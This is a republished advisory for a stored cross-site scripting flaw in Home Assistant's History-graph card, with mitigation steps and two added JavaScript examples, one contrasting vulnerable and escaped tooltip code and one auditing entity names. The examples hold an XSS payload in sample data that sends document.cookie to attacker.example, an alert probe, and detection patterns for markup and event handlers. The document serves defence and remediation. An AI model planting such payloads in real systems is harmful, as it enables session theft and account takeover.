CVE-2026-33045: Stored Cross-Site Scripting in Home Assistant History-Graph Card


This content originally appeared on DEV Community and was authored by CVE Reports

Vulnerability ID: CVE-2026-33045
CVSS Score: 7.3
Published: 2026-03-27

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Home Assistant frontend, specifically in the History-graph card. The card's chart tooltip renders entity names without HTML escaping, so an authenticated user with low privileges, or a malicious third-party integration, can store arbitrary JavaScript in an entity's friendly_name. The script runs in the victim's browser as soon as they hover over the graph, which can lead to session hijacking and full account takeover.

TL;DR

Stored XSS in Home Assistant's History-graph card allows attackers to execute arbitrary JavaScript via manipulated sensor names, leading to session hijacking.

⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-79
  • Attack Vector: Network
  • CVSS v4.0 Score: 7.3 (High)
  • EPSS Score: 0.00047 (14.49th percentile)
  • Impact: Confidentiality, Integrity, Availability (High)
  • Exploit Status: Proof-of-Concept Available
  • CISA KEV Status: Not Listed

Affected Systems

  • Home Assistant Core
  • Home Assistant Frontend
  • History-graph card (ha-chart-base)
  • Home Assistant Core / Frontend: 2025.02 to <2026.01 (Fixed in: 2026.01)

Exploit Details

  • Research Report: a stored XSS payload placed in a sensor's friendly_name is rendered unescaped in the card's Chart.js tooltip and fires when a user hovers over the graph
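To make the failure mode concrete, here is an added example (not Home Assistant's or Chart.js's code) of the rendering pattern behind this class of bug: a custom HTML tooltip that concatenates an entity's friendly_name into innerHTML-bound markup, beside the hardened version that HTML-encodes every attacker-influenced field. The tooltip builder, the helper names and the two sample state objects are constructed for the example; only the object shape (entity_id, state, attributes.friendly_name) follows Home Assistant's /api/states output.

```javascript
// Added example, not Home Assistant's or Chart.js's code. Models a custom HTML
// tooltip that renders an entity's friendly_name: the vulnerable builder
// interpolates the raw string into markup, the hardened one HTML-encodes it.

// Constructed sample states in Home Assistant's /api/states shape. The second
// entity's friendly_name carries a standard XSS probe; anyone who can rename an
// entity, or ship an integration that names one, controls this string.
const SAMPLE_STATES = [
  {
    entity_id: "sensor.living_room_temperature",
    state: "21.4",
    attributes: { friendly_name: "Living Room Temperature", unit_of_measurement: "°C" },
  },
  {
    entity_id: "sensor.rogue",
    state: "1",
    attributes: { friendly_name: '<img src=x onerror="alert(document.cookie)">' },
  },
];

// Encode the five characters that can terminate an HTML text or attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Map state objects to tooltip rows. The label falls back to entity_id, which is
// also user-controlled, so both fields must be treated as untrusted.
function toTooltipRows(states) {
  return states.map((s) => ({
    label: (s.attributes && s.attributes.friendly_name) || s.entity_id,
    value: s.state,
  }));
}

// VULNERABLE: the label is dropped straight into markup. If the caller assigns
// this string to tooltipEl.innerHTML (the usual "external tooltip" pattern),
// the <img> is created and its onerror handler runs the moment the tooltip shows.
function buildTooltipHtmlVulnerable(rows) {
  return rows
    .map((r) => `<div class="row"><span class="label">${r.label}</span>: ${r.value}</div>`)
    .join("");
}

// HARDENED: every attacker-influenced field is encoded before it reaches innerHTML,
// so the payload is displayed as text instead of parsed as markup.
function buildTooltipHtmlHardened(rows) {
  return rows
    .map((r) => `<div class="row"><span class="label">${escapeHtml(r.label)}</span>: ${escapeHtml(r.value)}</div>`)
    .join("");
}

// Check used below: does the rendered markup still contain a live <img> tag or an
// unencoded event-handler attribute from the payload?
function containsLivePayload(html) {
  return /<img\b/i.test(html) || /\bonerror\s*=\s*"/i.test(html);
}

const rows = toTooltipRows(SAMPLE_STATES);
console.log("vulnerable:", containsLivePayload(buildTooltipHtmlVulnerable(rows))); // true
console.log("hardened:  ", containsLivePayload(buildTooltipHtmlHardened(rows)));   // false
```

Chart.js's built-in tooltip is drawn on the canvas and cannot execute markup; the exposure comes from custom (external) tooltips that write labels into the DOM through innerHTML, which is the pattern modelled here. In a real component, prefer creating elements and setting textContent over building HTML strings at all; escapeHtml is shown because it is the minimal change to an existing string-building path.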

Mitigation Strategies

  • Upgrade to a patched version (Home Assistant 2026.01 or later)
  • Audit the entity registry and current states for entity names (friendly_name) that contain HTML markup; a payload stored before the upgrade remains in the database until the entity is renamed or removed
  • Add a strict Content Security Policy (CSP) as defense in depth; it narrows what injected script can do but does not remove the injection, and the dashboard must be re-tested after the policy is applied because an overly strict policy can break the frontend

Remediation Steps:

  1. In Home Assistant, open Settings and check the installed version on the About page.
  2. Update Home Assistant Core to version 2026.01 or later using the built-in updater or by redeploying the container.
  3. Review the entity registry for suspicious names, especially entities created by external integrations (the original report cites Android Auto as an example).
  4. Rename or remove any entity whose name contains HTML tags such as <script>, <img> or <iframe>, event-handler attributes such as onerror=, or stray markup characters (angle brackets, quotes, HTML entity sequences).
  5. Monitor for unexpected outbound requests from browsers that have the dashboard open; an XSS payload commonly exfiltrates credentials or session tokens to an attacker-controlled host.
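Steps 3 and 4 are easier to carry out from a list than by eye. The following is an added example, not Home Assistant's own tooling: it scans a dump of /api/states for string attributes that carry HTML tags, encoded markup, event-handler attributes or a javascript: scheme, ranks the findings, and prints a report. The sample dump, the indicator names and the severity scale are constructed for the example; only the object shape (entity_id, state, attributes) follows Home Assistant's REST API.

```javascript
// Added example, not Home Assistant's own tooling. Scans a Home Assistant
// /api/states dump for string attributes that carry HTML markup, encoded markup,
// event-handler attributes or a javascript: scheme, and ranks the findings.
// The dump below is constructed; only the object shape follows the REST API.

const SAMPLE_STATES_DUMP = [
  { entity_id: "sensor.outdoor_temperature", state: "12.1",
    attributes: { friendly_name: "Outdoor Temperature", unit_of_measurement: "°C" } },
  { entity_id: "sensor.rogue_device", state: "on",
    attributes: { friendly_name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' } },
  { entity_id: "sensor.sneaky", state: "0",
    attributes: { friendly_name: "Garage &lt;script&gt;", icon: "mdi:garage" } },
  { entity_id: "sensor.link", state: "1",
    attributes: { friendly_name: "Data Source", attribution: "javascript:alert(1)" } },
  { entity_id: "binary_sensor.front_door", state: "off",
    attributes: { friendly_name: "Front Door (a < b test)" } }, // stray bracket, not a tag
];

// Indicators in decreasing order of confidence. The tag pattern requires the tag
// name to follow "<" directly, as an HTML parser does, so "a < b" is not a tag.
const INDICATORS = [
  { name: "html-tag",       severity: "high",   re: /<\/?[a-z][\w-]*/i },
  { name: "event-handler",  severity: "high",   re: /\bon[a-z]+\s*=/i },
  { name: "script-scheme",  severity: "high",   re: /javascript\s*:/i },
  { name: "encoded-markup", severity: "medium", re: /&(#x?[0-9a-f]+|lt|gt|quot);/i },
  { name: "angle-bracket",  severity: "low",    re: /[<>]/ },
];
const RANK = { high: 3, medium: 2, low: 1 };

// Collect entity_id plus every string-valued attribute; integrations can put
// free text in attributes other than friendly_name (attribution, icon, ...).
function stringFields(stateObj) {
  const fields = { entity_id: stateObj.entity_id };
  for (const [k, v] of Object.entries(stateObj.attributes || {})) {
    if (typeof v === "string") fields[k] = v;
  }
  return fields;
}

// Returns one finding per flagged field, highest severity first (sort is stable,
// so ties keep dump order).
function auditStates(states) {
  const findings = [];
  for (const s of states) {
    for (const [field, value] of Object.entries(stringFields(s))) {
      const hits = INDICATORS.filter((ind) => ind.re.test(value));
      if (hits.length === 0) continue;
      const severity = hits.reduce(
        (best, h) => (RANK[h.severity] > RANK[best] ? h.severity : best), "low");
      findings.push({ entity_id: s.entity_id, field, value, severity, indicators: hits.map((h) => h.name) });
    }
  }
  return findings.sort((a, b) => RANK[b.severity] - RANK[a.severity]);
}

// Plain-text report for a ticket or runbook.
function formatFindings(findings) {
  if (findings.length === 0) return "no markup-bearing attributes found";
  return findings
    .map((f) => `${f.severity.toUpperCase().padEnd(6)} ${f.entity_id} [${f.field}] ${f.indicators.join(",")}: ${JSON.stringify(f.value)}`)
    .join("\n");
}

console.log(formatFindings(auditStates(SAMPLE_STATES_DUMP)));
```

Against a live instance, replace SAMPLE_STATES_DUMP with the parsed JSON of GET /api/states, fetched with a long-lived access token in an Authorization: Bearer header (the host and port of the instance are deployment-specific). Treat low findings as review items rather than incidents: a stray angle bracket in a name is often legitimate, whereas a tag, an event handler or a javascript: scheme in an entity attribute has no benign explanation.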

References

Read the full report for CVE-2026-33045 on our website for more details including interactive diagrams and full exploit analysis.




Source: CVE Reports | Sciencx, 2026-03-28, https://www.scien.cx/2026/03/28/cve-2026-33045-cve-2026-33045-stored-cross-site-scripting-in-home-assistant-history-graph-card/
